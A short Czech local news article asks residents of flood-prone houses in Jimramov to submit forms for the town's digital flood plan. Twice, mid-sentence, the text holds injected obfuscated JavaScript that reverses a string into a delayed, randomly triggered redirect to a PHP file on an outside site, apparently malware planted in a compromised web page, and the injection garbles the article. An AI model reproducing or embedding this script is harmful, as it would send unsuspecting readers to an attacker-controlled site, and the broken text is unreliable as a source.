Rainbow page separator

V Jimramově připravují digitální povodňový plán

Úterý, 3. února 2015

Jimramov

Jimramov / O vyplnění a zaslání formulářů pro zpracování digitálního povodňového plánu městyse žádají zástupci jimramovské radnice obyvatele domů v záplavovém území. Učinit tak mají do 18. února.
Plány vlastníků ohrožených nemovi[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tostí v záplavovém území Svratky a Fryšávky a v rozlivu jejich pří[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toků jsou součástí digitálního povodňového plánu městyse. Formulář, který byl vytvořen k usnadnění zpracování povodňových plánů majitelů domů, je v elektronické podobě dostupný na webu Jimramova a v tištěné formě v tamním úřadu. Poskytnuté údaje budou využity pro komunikaci při povodňových stavech.
Při tvorbě digitálního povodňového plánu chce jimramovská radnice využít dotačního titulu z operačního programu Životní prostředí. Zpracování zajišťuje pražská společnost Vodohospodářský rozvoj a výstavba.